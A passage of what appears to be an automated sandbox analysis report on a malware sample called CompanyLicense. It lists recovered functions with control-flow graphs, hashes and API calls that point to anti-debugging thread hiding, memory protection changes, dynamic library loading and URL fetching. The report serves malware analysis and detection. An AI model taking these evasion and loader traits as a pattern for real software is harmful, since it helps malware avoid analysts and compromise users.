                                      control_flow_graph 99 56833c-56847f call 566f5a * 2 call 563cde GetPEB 107 568485-5684c9 call 568b16 99->107 108 566f5a-566f62 99->108 115 563cc1-563cc5 107->115 116 5684cf-5684d3 107->116 109 5670a8-5670b6 LoadLibraryA call 5670b7 108->109 110 566f68-56706d call 567679 108->110 124 56706f-56708f call 567679 110->124 125 56709b-5670a5 call 5670b7 110->125 122 563cc6-563cd7 115->122 119 56882f 116->119 120 5684d9-56863d 116->120 130 568641-568644 120->130 122->122 126 563cd9-563cdb 122->126 124->125 135 567091-567096 call 567679 124->135 125->109 133 568832-56883a 130->133 134 56864a-56864d 130->134 136 56883e-568841 133->136 134->130 137 56864f-568655 134->137 135->125 139 568847-56884a 136->139 140 5689a5-5689b5 136->140 137->130 141 568657-56865b 137->141 139->136 143 56884c-568850 139->143 142 5689b9-5689bc 140->142 141->130 144 56865d-568667 141->144 145 5689be-5689c4 142->145 146 5689fc-568b13 call 568b16 142->146 143->136 147 568852-568856 143->147 148 56866c-568676 144->148 145->142 149 5689c6-5689ca 145->149 147->136 150 568858-56886a 147->150 151 568694-568696 148->151 152 568678-568690 148->152 149->142 156 5689cc-5689d0 149->156 157 56886f-568873 150->157 154 5686a2-5686a5 151->154 155 568698-5686a1 151->155 152->154 162 5687ed-5687f0 154->162 163 5686ab-5686af 154->163 155->154 156->142 159 5689d2-5689de 156->159 160 568895-56889b 157->160 161 568875-56887b 157->161 167 5689e3-5689e7 159->167 160->157 170 56889d-56899f call 568b16 160->170 168 568883-56888b 161->168 169 56887d-568881 161->169 165 5687f2-5687f8 162->165 166 56881c-568822 162->166 163->162 171 5686b5-5686c0 163->171 165->166 172 5687fa-56880e 165->172 166->148 173 568828-56882a call 568b16 166->173 174 5689f4-5689fa 167->174 175 5689e9-5689f3 167->175 168->160 169->168 176 56888d-568894 169->176 178 5686c2-5686c6 171->178 172->115 179 568814-568819 172->179 173->119 174->146 174->167 175->174 176->160 178->178 182 5686c8-5686cd 178->182 179->166 182->178 184 5686cf-5686d3 182->184 184->178 185 5686d5-5687ea 184->185 185->162
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadMemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 3389902171-0
                                      • Opcode ID: 6624410d494d2cbd570f373df4ac4c2dc275bd7830bf4ed86f4040004c6ff9e0
                                      • Instruction ID: 0f53d5845e9e03967720a4a842f6af105994810e9e70d1ac3283b332fdf6ecbc
                                      • Opcode Fuzzy Hash: 6624410d494d2cbd570f373df4ac4c2dc275bd7830bf4ed86f4040004c6ff9e0
                                      • Instruction Fuzzy Hash: B2A1A570A043428EDF25DF38C4D8739BE91BF66364F54C799E5A58F2E6CA348842C726
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056910C, Relevance: 1.7, APIs: 1, Instructions: 176nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 215 56910c-569115 216 569117-5691ea 215->216 217 5690a8-5690b1 215->217 218 5691eb-5691ed 216->218 219 569044-569045 217->219 220 5690b3-5690c6 217->220 224 5691f0-5691f7 218->224 221 569047-5690a7 219->221 222 568fd8-568fda 219->222 223 5690cb-5690d9 220->223 221->217 222->223 225 5690df-5690ee call 567c59 223->225 226 568ecb-568fd7 223->226 224->224 228 5691f9-569414 224->228 225->218 226->222 233 569419-569421 228->233 233->233 234 569423-56953a 233->234 237 5695a7-5696fa call 5696cf 234->237 238 56953c-569546 234->238 238->237 239 569548-56954c 238->239 239->237 241 56954e-569552 239->241 241->237 243 569554-56955b 241->243 243->237 245 56955d-569561 243->245 245->237 247 569563-569567 245->247 247->237 248 569569-569576 247->248 248->237 249 569578-569580 248->249 249->237 250 569582-56958a 249->250 250->237 251 56958c-569596 NtSetInformationThread 250->251 252 56959b-5695a3 251->252 252->252 253 5695a5 252->253 253->253
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction ID: f2b03f30767e698402bd6ec86e370cb051658c098484baef9bc7e22f2bb6b046
                                      • Opcode Fuzzy Hash: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction Fuzzy Hash: C951AF25C498C64BC71306B55458380FFB77FA2A34F8922E9DDA703526DB726DB487C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00568FE0, Relevance: 1.6, APIs: 1, Instructions: 134nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 254 568fe0-5690c6 256 5690cb-5690d9 254->256 257 5690df-5691ed call 567c59 256->257 258 568ecb-568fda 256->258 264 5691f0-5691f7 257->264 258->256 264->264 265 5691f9-569414 264->265 268 569419-569421 265->268 268->268 269 569423-56953a 268->269 272 5695a7-5696fa call 5696cf 269->272 273 56953c-569546 269->273 273->272 274 569548-56954c 273->274 274->272 276 56954e-569552 274->276 276->272 278 569554-56955b 276->278 278->272 280 56955d-569561 278->280 280->272 282 569563-569567 280->282 282->272 283 569569-569576 282->283 283->272 284 569578-569580 283->284 284->272 285 569582-56958a 284->285 285->272 286 56958c-569596 NtSetInformationThread 285->286 287 56959b-5695a3 286->287 287->287 288 5695a5 287->288 288->288
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction ID: 5af5dd7a5d4f5d5513a81c45093747a50a3f74192ba6742457940ef38df1633c
                                      • Opcode Fuzzy Hash: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction Fuzzy Hash: 9041C421D088C64BC72306B49458394FFB77F62628F8521D9DDA703566D7726DB4C7C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00569436, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 289 569436-569546 290 5695a7-5696fa call 5696cf 289->290 291 569548-56954c 289->291 291->290 292 56954e-569552 291->292 292->290 294 569554-56955b 292->294 294->290 296 56955d-569561 294->296 296->290 298 569563-569567 296->298 298->290 300 569569-569576 298->300 300->290 301 569578-569580 300->301 301->290 302 569582-56958a 301->302 302->290 303 56958c-569596 NtSetInformationThread 302->303 304 56959b-5695a3 303->304 304->304 305 5695a5 304->305 305->305
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction ID: 5a881b913e50ba4896c375fa2e842d8d5a0b4a785aef45db3e41f488fb53f874
                                      • Opcode Fuzzy Hash: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction Fuzzy Hash: FC310C25C498C60BC22306B55459380FFBA3E62A38FC921D99DA60353AD7736DB887D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00568EC6, Relevance: 1.6, APIs: 1, Instructions: 93nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 568ec6-568eca 339 568ecb-5690d9 338->339 343 5690df-5691ed call 567c59 339->343 347 5691f0-5691f7 343->347 347->347 348 5691f9-569414 347->348 351 569419-569421 348->351 351->351 352 569423-56953a 351->352 355 5695a7-5696fa call 5696cf 352->355 356 56953c-569546 352->356 356->355 357 569548-56954c 356->357 357->355 359 56954e-569552 357->359 359->355 361 569554-56955b 359->361 361->355 363 56955d-569561 361->363 363->355 365 569563-569567 363->365 365->355 366 569569-569576 365->366 366->355 367 569578-569580 366->367 367->355 368 569582-56958a 367->368 368->355 369 56958c-569596 NtSetInformationThread 368->369 370 56959b-5695a3 369->370 370->370 371 5695a5 370->371 371->371
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction ID: 0f4adc85efd90a0c5ff55c0c9d5f1633d4d46e43116c89b83198aa0f8601c2c8
                                      • Opcode Fuzzy Hash: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction Fuzzy Hash: 63314C31A00605CEEB2A5E24C8587B87FEAFFA1328FA44629C9138B594D73688C4C746
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 005695B9, Relevance: 1.6, APIs: 1, Instructions: 91nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 372 5695b9-5695c1 373 569554-56955b 372->373 374 5695c3-5696a7 372->374 375 5695a7-5696fa call 5696cf 373->375 376 56955d-569561 373->376 376->375 378 569563-569567 376->378 378->375 380 569569-569576 378->380 380->375 382 569578-569580 380->382 382->375 384 569582-56958a 382->384 384->375 385 56958c-569596 NtSetInformationThread 384->385 386 56959b-5695a3 385->386 386->386 387 5695a5 386->387 387->387
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction ID: 2aef6c200dcab7a49ca3bf2fe90cfc2d21fe9bc9097b17a99e332a54d576ec61
                                      • Opcode Fuzzy Hash: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction Fuzzy Hash: 4F31EC15C498CB07C21306B55459280FFBB3D63928BC921D99DB70353AD7632DB887D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00568B16, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005684C3,00000040,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00568B2F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                      • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                      • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 005647B3, Relevance: 3.1, APIs: 2, Instructions: 146networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • InternetOpenA.WININET(00565030,00000000,00000000,00000000,00000000), ref: 00564759
                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 005648C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: 0db7620123b624f9784a21a45176f9fee9e76534ac55bbfa6cf439f7cbe1218d
                                      • Instruction ID: b379d3df44972c37aa93222ec403f197c8dd8476f47b578ff1a2b68dd63bb007
                                      • Opcode Fuzzy Hash: 0db7620123b624f9784a21a45176f9fee9e76534ac55bbfa6cf439f7cbe1218d
                                      • Instruction Fuzzy Hash: 15514820C88ACB07D73206B44C653D4FFB77F42A14F8411E9ADAA47562E7726DB48BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056474B, Relevance: 3.1, APIs: 2, Instructions: 99networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 24 56474b-564761 InternetOpenA 26 564767-56479c call 568ec1 24->26 27 564abd-564ac8 24->27 26->27 31 5647a2-5648d3 InternetOpenUrlA 26->31 31->27 33 5648d9-564900 31->33 34 56490a-564925 33->34 35 564927-56492d 34->35 36 564931-564950 call 568ec1 34->36 35->36 36->27 39 564956-564960 36->39 40 564962-56496b 39->40 41 56496d-564ab6 call 568ec1 * 2 39->41 40->34
                                      APIs
                                      • InternetOpenA.WININET(00565030,00000000,00000000,00000000,00000000), ref: 00564759
                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 005648C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID:
                                      • API String ID: 2038078732-0
                                      • Opcode ID: c806c257683450e607116dd28127b7ea244bcee24aac477895ea219b98476499
                                      • Instruction ID: ec2fac4ecf6722a138af9a4c82795f186490357923e8f9c52b1e62ff3d3204cf
                                      • Opcode Fuzzy Hash: c806c257683450e607116dd28127b7ea244bcee24aac477895ea219b98476499
                                      • Instruction Fuzzy Hash: 8A31943028038BAFEF309E64CC95BEE3AA6BF40740F508525FD499B590E7729A80DF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056652A, Relevance: 1.7, APIs: 1, Instructions: 233COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 187 56652a-566531 188 5664c4-5664cd 187->188 189 566533-5665c3 187->189 191 566460-566461 188->191 192 5664cf-566512 188->192 190 5665c8-566635 189->190 197 566637-566733 190->197 193 5663f4-56640f GetLongPathNameW 191->193 194 566463-5664c3 191->194 195 566514-566517 192->195 193->195 194->188 195->187 199 566736-56693f 197->199 202 566948-56694b 199->202 203 566943 call 566f07 199->203 204 56694e-566a52 202->204 203->202 204->199 206 566a58-566a5e 204->206 206->204 207 566a64-566b96 call 566f07 * 2 call 566f1d 206->207
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction ID: 4f2e12fbdbbc84cceaac4a215dd226eca634f92652f6af262f788470f86d8982
                                      • Opcode Fuzzy Hash: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction Fuzzy Hash: AB815805C4D8C707C22302B5586A190FFBA7DA3924BC921DEADE64352BDB522DB487D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 005662F8, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 306 5662f8-566301 307 566294-5662f0 306->307 308 566303-56640f GetLongPathNameW 306->308 309 566514-566531 308->309 312 5664c4-5664cd 309->312 313 566533-5665c3 309->313 315 566460-566461 312->315 316 5664cf-566512 312->316 314 5665c8-566635 313->314 320 566637-566733 314->320 317 5663f4-56640f GetLongPathNameW 315->317 318 566463-5664c3 315->318 316->309 317->309 318->312 322 566736-56693f 320->322 325 566948-56694b 322->325 326 566943 call 566f07 322->326 327 56694e-566a52 325->327 326->325 327->322 329 566a58-566a5e 327->329 329->327 330 566a64-566b96 call 566f07 * 2 call 566f1d 329->330
                                      APIs
                                      • GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00566409
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction ID: d464df362d2051177ad77dc40407c2556f929e4ed9738446eb5cb0d22ff748f6
                                      • Opcode Fuzzy Hash: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction Fuzzy Hash: 8A31D809C4D9C747C21302B51859290FF7A3DA3828BC921DAADE74352BDB527D788BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00566F6E, Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 388 566f6e-56706d call 567679 392 56706f-56708f call 567679 388->392 393 56709b-5670b6 call 5670b7 LoadLibraryA call 5670b7 388->393 392->393 398 567091-567096 call 567679 392->398 398->393
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,321C9581,?,00568349,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005670A8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction ID: 721ecd3894ca084b228b8841ea60466b1860a73fb9e8db5f12ba839da272e776
                                      • Opcode Fuzzy Hash: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction Fuzzy Hash: 9C218C05C4D9CB03C62216F52459254FF763DA2938BC531DEADE60352BDB622DB44BE3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00562D8F, Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 403 562d8f-562dc5 404 562dc7-563ea4 TerminateThread * 2 call 562ed5 403->404 405 562dbb-562dc5 403->405 411 563fee-563ff5 404->411 412 563eaa-563fad 404->412 405->404 405->405 412->411 414 563faf-563fbf call 563cc1 call 563cde 412->414 414->411 419 563fc1-563fc4 414->419 419->411 420 563fc6-563feb 419->420
                                      APIs
                                      • TerminateThread.KERNEL32(000000FE,00000000), ref: 00562ECA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: TerminateThread
                                      • String ID:
                                      • API String ID: 1852365436-0
                                      • Opcode ID: ca0d9b70fe0d9983a5b9164d56431518c93dad3cd5572cca66b608f20cba59c7
                                      • Instruction ID: bee02711e065faa4ec4cd70475220f30accd74e7f8d5b1de8149e97ce2477653
                                      • Opcode Fuzzy Hash: ca0d9b70fe0d9983a5b9164d56431518c93dad3cd5572cca66b608f20cba59c7
                                      • Instruction Fuzzy Hash: FD019A70504300AFE7118B68CD8AF597F78FF06325F2116D2E922DB2E2C27AD944CB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00562DB8, Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 422 562db8 423 562dbb-562dc5 422->423 423->423 424 562dc7-562eca TerminateThread 423->424 426 562ed0-563ea4 TerminateThread call 562ed5 424->426 430 563fee-563ff5 426->430 431 563eaa-563fad 426->431 431->430 433 563faf-563fbf call 563cc1 call 563cde 431->433 433->430 438 563fc1-563fc4 433->438 438->430 439 563fc6-563feb 438->439
                                      APIs
                                      • TerminateThread.KERNEL32(000000FE,00000000), ref: 00562ECA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: TerminateThread
                                      • String ID:
                                      • API String ID: 1852365436-0
                                      • Opcode ID: 7ac7241c32b1d5aec292323bd9fc0e90fc992831f8f173f807a8dd4001d962a3
                                      • Instruction ID: cf139ac06cc818f527259e6079825823f819f1f9e00f038d706e3abde67c1bbc
                                      • Opcode Fuzzy Hash: 7ac7241c32b1d5aec292323bd9fc0e90fc992831f8f173f807a8dd4001d962a3
                                      • Instruction Fuzzy Hash: 97017CB0500704AFE7108B54DDC9F597F64FF15325F211291F9129B2E2D37ADD80C621
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00566F5A, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 441 566f5a-566f62 442 5670a8-5670b6 LoadLibraryA call 5670b7 441->442 443 566f68-56706d call 567679 441->443 449 56706f-56708f call 567679 443->449 450 56709b-5670a5 call 5670b7 443->450 449->450 455 567091-567096 call 567679 449->455 450->442 455->450
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,321C9581,?,00568349,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005670A8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: f73005b374b5b0d115f1012be917be70e080a8666df267e42468d40e741d539c
                                      • Instruction ID: 1a0de0a03019528d6c5b9be98d964161e11ed1cd0f99eb0c81d580550c6e88ea
                                      • Opcode Fuzzy Hash: f73005b374b5b0d115f1012be917be70e080a8666df267e42468d40e741d539c
                                      • Instruction Fuzzy Hash: 9CE0229010CB8EB8CF203F74A80CF7E1D08BFE87BCF60AA56F445871068A3489804CB2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056414A, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00564127,00564170), ref: 00564162
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction ID: fb4e8a10fca13062ed22e8844e0c5964df734744d4ab3234c114c16073b3e70e
                                      • Opcode Fuzzy Hash: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction Fuzzy Hash: 90C09B717D4304B6FE3486209D5BFC562155F50F00F508509BF493C1C557F15551C519
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 005662F3, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00566409
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 2be7c1feb4ecd39644906e0085743717e45d92d3ff050de8aabb7bb5476945b2
                                      • Instruction ID: 627c620c6dbd80c6e5f57b96f72c8ae5dde91e8ed2f716539693220a1849ff15
                                      • Opcode Fuzzy Hash: 2be7c1feb4ecd39644906e0085743717e45d92d3ff050de8aabb7bb5476945b2
                                      • Instruction Fuzzy Hash: 6DC04075304301FBD7549654CCC5F5AB664BB54701F505C15F596C7245C530D8445735
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056726E, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9b021fd2fe38c264aad87d2315d1c818bad1e5889d60c321bfaa3c6a802403c5
                                      • Instruction ID: 7cdab13a9082c8b8e5f68036e5ba89e3e520b4c2c5fdfe8e834c7e88764a9b33
                                      • Opcode Fuzzy Hash: 9b021fd2fe38c264aad87d2315d1c818bad1e5889d60c321bfaa3c6a802403c5
                                      • Instruction Fuzzy Hash: A5C04C7551060EBBCF115FA0DD2CBCF3BAAFF06351F508614FA25960A4CB3585759B11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions